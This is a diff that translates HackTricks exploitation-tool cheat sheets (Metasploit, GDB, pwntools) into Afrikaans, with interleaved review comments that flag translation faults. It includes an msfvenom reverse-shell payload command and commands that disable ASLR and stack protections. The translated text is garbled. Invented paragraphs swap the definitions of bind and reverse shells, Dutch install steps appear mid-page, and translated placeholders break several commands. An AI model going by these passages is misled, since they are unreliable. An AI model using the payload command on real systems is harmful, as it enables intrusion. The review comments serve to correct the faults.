* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Metasploit
|
||||
|
||||
```
|
||||
pattern_create.rb -l 3000 #Length
|
||||
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
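Review bot: the footer translation differs from file to file in this commit, so readers get several versions of the same boilerplate: `* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks**...` here versus `* As jy jou **maatskappy geadverteer wil sien in HackTricks**...` in the ROP page, and `GitHub-opslagplekke`, `github-opslagplekke` and `github-repos` for "github repos". Settle on one Afrikaans footer and paste the same block into every page; the Dutch footer in the ROP page needs replacing as part of that.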
@ -24,72 +21,101 @@ nasm_shell.rb
nasm> jmp esp #Get opcodes
|
||||
msfelfscan -j esi /opt/fusion/bin/level01
|
||||
```
|
||||
## Skulpe
|
||||
|
||||
## Shellcodes
|
||||
'n Skulp is 'n klein stukkie uitvoerbare kode wat gebruik word in die uitbuiting van 'n sekuriteitskwesbaarheid om toegang tot 'n rekenaarstelsel te verkry. Dit is gewoonlik in masjienkode en word gebruik om 'n spesifieke taak uit te voer, soos die verkryging van beheer oor 'n stelsel of die uitvoering van 'n sekere funksie.
|
||||
|
||||
Skulpe word dikwels gebruik in die konteks van aanvalle soos bufferoorloopaanvalle, waar die aanvaller probeer om buite die grense van 'n toegewysde geheuegebied te skryf en sodoende die uitvoering van eie kode te bewerkstellig. Hierdie kode kan dan gebruik word om die aanvaller toegang tot die stelsel te gee, vertroulike inligting te steel of ander skadelike aktiwiteite uit te voer.
|
||||
|
||||
Daar is verskillende tipes skulpe, insluitend bindskulpe en omgekeerde skulpe. 'n Bindskulp is 'n stukkie kode wat 'n verbinding met die aanvaller se stelsel vestig en die beheer oor die aangevalle stelsel oorneem. 'n Omgekeerde skulp daarenteen maak dit vir die aanvaller moontlik om 'n verbinding met die aangevalle stelsel te maak en dit vanaf sy eie stelsel te beheer.
|
||||
|
||||
Die ontwikkeling van skulpe vereis 'n goeie begrip van masjienkode en die spesifieke stelsel waarop dit uitgevoer word. Dit is belangrik om te verseker dat die skulp korrek geoptimaliseer is vir die teikenstelsel en dat dit nie opgespoor of geblokkeer kan word deur sekuriteitsmaatreëls nie.
|
||||
```
|
||||
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
|
||||
```
|
||||
|
||||
# GDB
|
||||
|
||||
## Install
|
||||
## Installeer
|
||||
|
||||
Om GDB te installeren, volg je de onderstaande stappen:
|
||||
|
||||
### Linux
|
||||
|
||||
1. Open een terminalvenster.
|
||||
2. Voer het volgende commando in om GDB te installeren:
|
||||
|
||||
```bash
|
||||
sudo apt-get install gdb
|
||||
```
|
||||
|
||||
### macOS
|
||||
|
||||
1. Open een terminalvenster.
|
||||
2. Voer het volgende commando in om GDB te installeren met Homebrew:
|
||||
|
||||
```bash
|
||||
brew install gdb
|
||||
```
|
||||
|
||||
### Windows
|
||||
|
||||
1. Download de GDB-installatiebestanden van de officiële website.
|
||||
2. Voer het installatieprogramma uit en volg de instructies op het scherm.
|
||||
|
||||
Zodra de installatie is voltooid, kun je GDB gebruiken om programma's te debuggen en te analyseren.
|
||||
```
|
||||
apt-get install gdb
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
**-q** --> No show banner\
|
||||
**-x \<file>** --> Auto-execute GDB instructions from here\
|
||||
**-p \<pid>** --> Attach to process
|
||||
**-q** --> Geen banner wysig\
|
||||
**-x \<lêer>** --> Voer GDB instruksies outomaties uit vanaf hier\
|
||||
**-p \<pid>** --> Koppel aan proses
|
||||
|
||||
### Instructions
|
||||
### Instruksies
|
||||
|
||||
\> **disassemble main** --> Disassemble the function\
|
||||
\> **disassemble main** --> Ontleed die funksie\
|
||||
\> **disassemble 0x12345678**\
|
||||
\> **set disassembly-flavor intel**\
|
||||
\> **set follow-fork-mode child/parent** --> Follow created process\
|
||||
\> **p system** --> Find the address of the system function\
|
||||
\> **set follow-fork-mode child/parent** --> Volg geskep prosesse\
|
||||
\> **p system** --> Vind die adres van die system funksie\
|
||||
\> **help**\
|
||||
\> **quit**
|
||||
|
||||
\> **br func** --> Add breakpoint to function\
|
||||
\> **br func** --> Voeg breekpunt by funksie by\
|
||||
\> **br \*func+23**\
|
||||
\> **br \*0x12345678**\
|
||||
**> del NUM** --> Delete that number of br\
|
||||
\> **watch EXPRESSION** --> Break if the value changes
|
||||
**> del NUM** --> Verwyder daardie aantal breekpunte\
|
||||
\> **watch UITDRUKKING** --> Breek as die waarde verander
|
||||
|
||||
**> run** --> Execute\
|
||||
**> start** --> Start and break in main\
|
||||
\> **n/next** --> Execute next instruction (no inside)\
|
||||
\> **s/step** --> Execute next instruction\
|
||||
\> **c/continue** --> Continue until next breakpoint
|
||||
**> run** --> Voer uit\
|
||||
**> start** --> Begin en breek in main\
|
||||
\> **n/next** --> Voer volgende instruksie uit (nie binne nie)\
|
||||
\> **s/step** --> Voer volgende instruksie uit\
|
||||
\> **c/continue** --> Gaan voort tot volgende breekpunt
|
||||
|
||||
\> **set $eip = 0x12345678** --> Change value of $eip\
|
||||
\> **info functions** --> Info abount functions\
|
||||
\> **info functions func** --> Info of the funtion\
|
||||
\> **info registers** --> Value of the registers\
|
||||
\> **bt** --> Stack\
|
||||
\> **bt full** --> Detailed stack
|
||||
\> **set $eip = 0x12345678** --> Verander waarde van $eip\
|
||||
\> **info functions** --> Inligting oor funksies\
|
||||
\> **info functions func** --> Inligting oor die funksie\
|
||||
\> **info registers** --> Waarde van die registers\
|
||||
\> **bt** --> Stapel\
|
||||
\> **bt full** --> Gedetailleerde stapel
|
||||
|
||||
\> **print variable**\
|
||||
\> **print 0x87654321 - 0x12345678** --> Caculate\
|
||||
\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Shows content in octal/hexa/10/bin/instruction/ascii
|
||||
\> **print veranderlike**\
|
||||
\> **print 0x87654321 - 0x12345678** --> Bereken\
|
||||
\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Wys inhoud in oktaal/heksadesimale/10/binêre/instruksie/ASCII
|
||||
|
||||
* **x/o 0xDir\_hex**
|
||||
* **x/2x $eip** --> 2Words from EIP
|
||||
* **x/2x $eip** --> 2 Woorde vanaf EIP
|
||||
* **x/2x $eip -4** --> $eip - 4
|
||||
* **x/8xb $eip** --> 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
|
||||
* **i r eip** --> Value of $eip
|
||||
* **x/w pointer** --> Value of the pointer
|
||||
* **x/s pointer** --> String pointed by the pointer
|
||||
* **x/xw \&pointer** --> Address where the pointer is located
|
||||
* **x/i $eip** —> Instructions of the EIP
|
||||
* **x/8xb $eip** --> 8 byte (b-> byte, h-> 2 byte, w-> 4 byte, g-> 8 byte)
|
||||
* **i r eip** --> Waarde van $eip
|
||||
* **x/w pointer** --> Waarde van die wyser
|
||||
* **x/s pointer** --> String wat deur die wyser aangedui word
|
||||
* **x/xw \&pointer** --> Adres waar die wyser geleë is
|
||||
* **x/i $eip** —> Instruksies van die EIP
|
||||
|
||||
## [GEF](https://github.com/hugsy/gef)
|
||||
|
||||
```bash
|
||||
checksec #Check protections
|
||||
p system #Find system function address
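Review bot: `## Skulpe` mistranslates "Shellcodes" ("skulp" is a shell), and the four paragraphs under it are new text rather than a translation, since the original section held only the `msfvenom` command; they also swap the two terms they define: `'n Bindskulp is 'n stukkie kode wat 'n verbinding met die aanvaller se stelsel vestig` describes a reverse shell, and the following sentence's "omgekeerde skulp" describes a bind shell (a bind shell listens on the host, a reverse shell connects out). Keep the heading as `## Shellcodes` and drop the paragraphs. `## Installeer` likewise gained Dutch, not Afrikaans, install steps (`Om GDB te installeren, volg je de onderstaande stappen:`, with a `brew install gdb` block and a Windows section) while the original `apt-get install gdb` block is kept, so the Linux command now appears twice; remove the added steps. Also `**-q** --> Geen banner wysig` should read "wys" (show); "wysig" means modify.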
@ -109,34 +135,32 @@ pattern search $rsp #Search the offset given the content of $rsp
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
|
||||
2- ef➤ i f
|
||||
Stack level 0, frame at 0x7fffffffddd0:
|
||||
rip = 0x400cd3; saved rip = 0x6261617762616176
|
||||
called by frame at 0x7fffffffddd8
|
||||
Arglist at 0x7fffffffdcf8, args:
|
||||
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
|
||||
Saved registers:
|
||||
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
|
||||
rip = 0x400cd3; saved rip = 0x6261617762616176
|
||||
called by frame at 0x7fffffffddd8
|
||||
Arglist at 0x7fffffffdcf8, args:
|
||||
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
|
||||
Saved registers:
|
||||
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
|
||||
gef➤ pattern search 0x6261617762616176
|
||||
[+] Searching for '0x6261617762616176'
|
||||
[+] Found at offset 184 (little-endian search) likely
|
||||
```
|
||||
## Truuks
|
||||
|
||||
## Tricks
|
||||
### GDB dieselfde adresse
|
||||
|
||||
### GDB same addresses
|
||||
|
||||
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
|
||||
Terwyl jy GDB foutopsporing doen, sal GDB **effens verskillende adresse hê as die een wat deur die binêre lêer gebruik word wanneer dit uitgevoer word.** Jy kan GDB dieselfde adresse laat hê deur die volgende te doen:
|
||||
|
||||
* `unset env LINES`
|
||||
* `unset env COLUMNS`
|
||||
* `set env _=<path>` _Put the absolute path to the binary_
|
||||
* Exploit the binary using the same absolute route
|
||||
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
|
||||
* `set env _=<pad>` _Plaas die absolute pad na die binêre lêer_
|
||||
* Exploiteer die binêre lêer deur dieselfde absolute roete te gebruik
|
||||
* `PWD` en `OLDPWD` moet dieselfde wees wanneer jy GDB gebruik en wanneer jy die binêre lêer uitbuit
|
||||
|
||||
### Backtrace to find functions called
|
||||
|
||||
When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\
|
||||
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called:
|
||||
### Terugvoetspoor om opgeroepde funksies te vind
|
||||
|
||||
Wanneer jy 'n **staties gekoppelde binêre lêer** het, sal al die funksies aan die binêre lêer behoort (en nie aan eksterne biblioteke nie). In hierdie geval sal dit moeilik wees om **die vloei te identifiseer wat die binêre lêer volg om byvoorbeeld vir gebruikersinvoer te vra**.\
|
||||
Jy kan hierdie vloei maklik identifiseer deur die binêre lêer met **gdb** te **hardloop** totdat jy gevra word vir invoer. Stop dit dan met **CTRL+C** en gebruik die **`bt`** (**terugvoetspoor**) bevel om die opgeroepde funksies te sien:
|
||||
```
|
||||
gef➤ bt
|
||||
#0 0x00000000004498ae in ?? ()
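Review bot: `### Terugvoetspoor om opgeroepde funksies te vind` and `(**terugvoetspoor**)` coin a word for "backtrace" that readers will not connect with the `bt` command; keep `backtrace`, the command's own name, just as the GEF heading keeps its tool name. In the same-addresses list the two verbs for "exploit" disagree, `* Exploiteer die binêre lêer deur dieselfde absolute roete te gebruik` next to `wanneer jy die binêre lêer uitbuit`; use one. The context lines at the top carry pre-existing typos worth fixing while here: `ppatern`, `ovwerwrite`, and `2- ef➤ i f` for `gef➤`.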
@ -145,95 +169,88 @@ gef➤ bt
#3 0x00000000004011a9 in ?? ()
|
||||
#4 0x0000000000400a5a in ?? ()
|
||||
```
|
||||
## GDB-bediener
|
||||
|
||||
## GDB server
|
||||
|
||||
`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine)
|
||||
`gdbserver --multi 0.0.0.0:23947` (in IDA moet jy die absolute pad van die uitvoerbare lêer in die Linux-masjien en in die Windows-masjien invul)
|
||||
|
||||
# Ghidra
|
||||
|
||||
## Find stack offset
|
||||
## Vind stapelverskuiwing
|
||||
|
||||
**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\
|
||||
For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\
|
||||
_Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
|
||||
**Ghidra** is baie nuttig om die **verskuiwing** vir 'n **buffer-oorvloei te vind danksy die inligting oor die posisie van die plaaslike veranderlikes.**\
|
||||
Byvoorbeeld, in die voorbeeld hieronder, dui 'n buffer-oorvloei in `local_bc` aan dat jy 'n verskuiwing van `0xbc` benodig. Verder, as `local_10` 'n kanariekoek is, dui dit aan dat daar 'n verskuiwing van `0xac` is om dit vanaf `local_bc` te oorskryf.\
|
||||
_Onthou dat die eerste 0x08 waar die RIP gestoor word, aan die RBP behoort._
|
||||
|
||||
![](<../../.gitbook/assets/image (616).png>)
|
||||
|
||||
# GCC
|
||||
|
||||
**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\
|
||||
**-o** --> Output\
|
||||
**-g** --> Save code (GDB will be able to see it)\
|
||||
**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> To deactivate the ASLR in linux
|
||||
**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Kompileer sonder beskerming\
|
||||
**-o** --> Uitset\
|
||||
**-g** --> Stoor kode (GDB sal dit kan sien)\
|
||||
**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> Om die ASLR in Linux te deaktiveer
|
||||
|
||||
**To compile a shellcode:**\
|
||||
**nasm -f elf assembly.asm** --> return a ".o"\
|
||||
**ld assembly.o -o shellcodeout** --> Executable
|
||||
**Om 'n skulpkode te kompileer:**\
|
||||
**nasm -f elf assembly.asm** --> Gee 'n ".o"\
|
||||
**ld assembly.o -o shellcodeout** --> Uitvoerbaar
|
||||
|
||||
# Objdump
|
||||
|
||||
**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\
|
||||
**-Mintel** --> **Intel** syntax\
|
||||
**-t** --> **Symbols** table\
|
||||
**-D** --> **Disassemble all** (address of static variable)\
|
||||
**-s -j .dtors** --> dtors section\
|
||||
**-s -j .got** --> got section\
|
||||
\-D -s -j .plt --> **plt** section **decompiled**\
|
||||
**-TR** --> **Relocations**\
|
||||
**ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\
|
||||
**objdump -D ./exec | grep "VAR\_NAME"** --> Address or a static variable (those are stored in DATA section).
|
||||
**-d** --> Ontbind uitvoerbare afdelings (sien opkode van 'n gekompileerde skulpkode, vind ROP-toestelle, vind funksie-adres...)\
|
||||
**-Mintel** --> **Intel** sintaksis\
|
||||
**-t** --> **Simbole**-tabel\
|
||||
**-D** --> Ontbind alles (adres van statiese veranderlike)\
|
||||
**-s -j .dtors** --> dtors-afdeling\
|
||||
**-s -j .got** --> got-afdeling\
|
||||
\-D -s -j .plt --> **plt**-afdeling **ontbind**\
|
||||
**-TR** --> **Herskikkinge**\
|
||||
**ojdump -t --dynamic-relo ./exec | grep puts** --> Adres van "puts" om in GOT te wysig\
|
||||
**objdump -D ./exec | grep "VAR\_NAME"** --> Adres van 'n statiese veranderlike (hierdie word in DATA-afdeling gestoor).
|
||||
|
||||
# Core dumps
|
||||
# Kernaflewerings
|
||||
|
||||
1. Run `ulimit -c unlimited` before starting my program
|
||||
2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
|
||||
1. Voer `ulimit -c unlimited` uit voordat jy my program begin
|
||||
2. Voer `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` uit
|
||||
3. sudo gdb --core=\<path/core> --quiet
|
||||
|
||||
# More
|
||||
# Meer
|
||||
|
||||
**ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\
|
||||
**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> Loop to see if the address changes a lot\
|
||||
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset of "system"\
|
||||
**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset of "/bin/sh"
|
||||
**ldd uitvoerbare | grep libc.so.6** --> Adres (as ASLR, verander dit dan elke keer)\
|
||||
**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> Lus om te sien of die adres baie verander\
|
||||
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Verskuiwing van "system"\
|
||||
**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Verskuiwing van "/bin/sh"
|
||||
|
||||
**strace executable** --> Functions called by the executable\
|
||||
**rabin2 -i ejecutable -->** Address of all the functions
|
||||
**strace uitvoerbare** --> Funksies wat deur die uitvoerbare aangeroep word\
|
||||
**rabin2 -i ejecutable -->** Adres van al die funksies
|
||||
|
||||
# **Inmunity debugger**
|
||||
|
||||
```bash
|
||||
!mona modules #Get protections, look for all false except last one (Dll of SO)
|
||||
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
|
||||
```
|
||||
|
||||
# IDA
|
||||
|
||||
## Debugging in remote linux
|
||||
|
||||
Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary:
|
||||
## Debugging in afgeleë Linux
|
||||
|
||||
Binêre lêers wat gebruik kan word om 'n binêre lêer binne 'n Linux te ontleed, kan binne die IDA-vouer gevind word. Om dit te doen, skuif die binêre lêer _linux\_server_ of _linux\_server64_ na die Linux-bediener en voer dit uit binne die vouer wat die binêre lêer bevat:
|
||||
```
|
||||
./linux_server64 -Ppass
|
||||
```
|
||||
|
||||
Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
|
||||
Stel dan die debugger in: Debugger (linux remote) --> Proses opsies...:
|
||||
|
||||
![](<../../.gitbook/assets/image (101).png>)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
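Review bot: the placeholder arguments inside the commands were translated together with the prose: `**ldd uitvoerbare | grep libc.so.6**` and `**strace uitvoerbare**` now show a word a reader will paste literally, while the neighbouring loop and rabin2 lines keep `\<Ejecutable>` and `ejecutable` from the source. Keep the command text exactly as the original has it (better still, use one placeholder such as `<executable>` in all four lines) and translate only the explanation after `-->`. The same applies to UI labels in the IDA section: `Debugger (linux remote) --> Proses opsies...` will not be found in IDA's Debugger menu, which shows `Process options...`; keep menu items verbatim. Minor: `om 'n binêre lêer binne 'n Linux te ontleed` says "analyse", the source says "debug" (`om te debug`), which is what `linux_server64 -Ppass` is for.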
@ -1,133 +1,123 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
```
|
||||
pip3 install pwntools
|
||||
```
|
||||
|
||||
# Pwn asm
|
||||
|
||||
Get opcodes from line or file.
|
||||
|
||||
Kry opcodes van 'n lyn of lêer.
|
||||
```
|
||||
pwn asm "jmp esp"
|
||||
pwn asm "jmp esp"
|
||||
pwn asm -i <filepath>
|
||||
```
|
||||
**Kan kies:**
|
||||
|
||||
**Can select:**
|
||||
* uitvoertipe (rou, heks, string, elf)
|
||||
* uitvoerlêerkonteks (16,32,64,linux,windows...)
|
||||
* vermyt byte (nuwe lyne, nul, 'n lys)
|
||||
* kies 'n enkoder om die shellkode te debugeer deur gdb die uitvoer te laat loop
|
||||
|
||||
* output type (raw,hex,string,elf)
|
||||
* output file context (16,32,64,linux,windows...)
|
||||
* avoid bytes (new lines, null, a list)
|
||||
* select encoder debug shellcode using gdb run the output
|
||||
|
||||
# **Pwn checksec**
|
||||
|
||||
Checksec script
|
||||
# **Pwn checksec**
|
||||
|
||||
Checksec-skrip
|
||||
```
|
||||
pwn checksec <executable>
|
||||
```
|
||||
|
||||
# Pwn constgrep
|
||||
|
||||
# Pwn cyclic
|
||||
|
||||
Get a pattern
|
||||
# Pwn siklies
|
||||
|
||||
Kry 'n patroon
|
||||
```
|
||||
pwn cyclic 3000
|
||||
pwn cyclic -l faad
|
||||
```
|
||||
**Kan kies:**
|
||||
|
||||
**Can select:**
|
||||
|
||||
* The used alphabet (lowercase chars by default)
|
||||
* Length of uniq pattern (default 4)
|
||||
* context (16,32,64,linux,windows...)
|
||||
* Take the offset (-l)
|
||||
* Die gebruikte alfabet (standaard kleinletters)
|
||||
* Lengte van unieke patroon (standaard 4)
|
||||
* Konteks (16,32,64,linux,windows...)
|
||||
* Neem die offset (-l)
|
||||
|
||||
# Pwn debug
|
||||
|
||||
Attach GDB to a process
|
||||
|
||||
Hef GDB aan 'n proses aan
|
||||
```
|
||||
pwn debug --exec /bin/bash
|
||||
pwn debug --pid 1234
|
||||
pwn debug --process bash
|
||||
```
|
||||
**Kan kies:**
|
||||
|
||||
**Can select:**
|
||||
|
||||
* By executable, by name or by pid context (16,32,64,linux,windows...)
|
||||
* gdbscript to execute
|
||||
* sysrootpath
|
||||
* Volgens uitvoerbare lêer, naam of pid konteks (16,32,64,linux,windows...)
|
||||
* gdbskrip om uit te voer
|
||||
* sysrootpad
|
||||
|
||||
# Pwn disablenx
|
||||
|
||||
Disable nx of a binary
|
||||
|
||||
Deaktiveer nx van 'n binêre lêer
|
||||
```
|
||||
pwn disablenx <filepath>
|
||||
```
|
||||
|
||||
# Pwn disasm
|
||||
|
||||
Disas hex opcodes
|
||||
|
||||
Ontbind heksadesimale opcodes
|
||||
```
|
||||
pwn disasm ffe4
|
||||
```
|
||||
**Kan kies:**
|
||||
|
||||
**Can select:**
|
||||
|
||||
* context (16,32,64,linux,windows...)
|
||||
* base addres
|
||||
* color(default)/no color
|
||||
* konteks (16,32,64,linux,windows...)
|
||||
* basisadres
|
||||
* kleur (standaard)/geen kleur
|
||||
|
||||
# Pwn elfdiff
|
||||
|
||||
Print differences between 2 fiels
|
||||
|
||||
Druk verskille tussen 2 lêers af
|
||||
```
|
||||
pwn elfdiff <file1> <file2>
|
||||
```
|
||||
# Grys hex
|
||||
|
||||
# Pwn hex
|
||||
|
||||
Get hexadecimal representation
|
||||
|
||||
Kry die heksadesimale voorstelling
|
||||
```bash
|
||||
pwn hex hola #Get hex of "hola" ascii
|
||||
```
|
||||
|
||||
# Pwn phd
|
||||
|
||||
Get hexdump
|
||||
Kry hexdump
|
||||
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
# Verbind met die bediener
|
||||
r = remote('example.com', 1337)
|
||||
|
||||
# Kry die hexdump van die ontvangsdata
|
||||
data = r.recv()
|
||||
hexdump(data)
|
||||
```
|
||||
|
||||
Die `hexdump`-funksie in `pwntools` kan gebruik word om die ontvangsdata in 'n hexdump-formaat te vertoon. Hier is 'n voorbeeld van hoe om dit te gebruik. Eerstens, maak 'n verbind met die bediener deur die `remote`-funksie te gebruik en die bediener se adres en poortnommer te spesifiseer. Dan, ontvang die data van die bediener deur die `recv`-funksie te gebruik. Laastens, gebruik die `hexdump`-funksie om die data in 'n hexdump-formaat te vertoon.
|
||||
```
|
||||
pwn phd <file>
|
||||
```
|
||||
**Kan kies:**
|
||||
|
||||
**Can select:**
|
||||
|
||||
* Number of bytes to show
|
||||
* Number of bytes per line highlight byte
|
||||
* Skip bytes at beginning
|
||||
* Aantal bytes om te wys
|
||||
* Aantal bytes per lyn om te beklemtoon
|
||||
* Slaan bytes aan die begin oor
|
||||
|
||||
# Pwn pwnstrip
|
||||
|
||||
|
